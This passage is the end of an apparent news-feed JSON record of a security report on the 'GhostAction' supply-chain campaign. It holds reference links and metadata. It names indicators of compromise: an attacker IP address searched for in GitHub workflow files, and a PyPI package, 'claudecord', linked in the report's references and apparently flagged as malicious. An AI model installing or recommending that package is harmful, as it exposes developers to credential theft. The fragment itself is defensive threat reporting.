workflow](https://github.com/search?q=path%3Asecurity-audit.yml+193.32.204.199&type=code)\n- [PyPI: claudecord](https://pypi.org/project/claudecord/)\n- [OpenSourceMalware GhostAction infrastructure assessment](ghostaction_infrastructure_2026-10-09.md)\n\nReport suspicious packages and repositories to [OpenSourceMalware.com](https://opensourcemalware.com).\n\n*Report generated by the OpenSourceMalware Team.*", "url": "https://wpnews.pro/news/ghostaction-attack-escalates-by-targeting-github-users", "canonical_source": "https://opensourcemalware.com/blog/ghostaction-attack-escalates", "published_at": "2026-10-09 23:55:53+00:00", "updated_at": "2026-10-09 23:57:59.244536+00:00", "lang": "en", "topics": ["ai-safety"], "entities": ["OpenSourceMalware", "GitHub", "GitLab", "GitGuardian", "Socket", "StepSecurity", "my-github.com", "my-gitlab.com"], "also_reported_by": [], "alternates": {"html": "https://wpnews.pro/news/ghostaction-attack-escalates-by-targeting-github-users", "markdown": "https://wpnews.pro/news/ghostaction-attack-escalates-by-targeting-github-users.md", "text": "https://wpnews.pro/news/ghostaction-attack-escalates-by-targeting-github-users.txt", "jsonld": "https://wpnews.pro/news/ghostaction-attack-escalates-by-targeting-github-users.jsonld"}}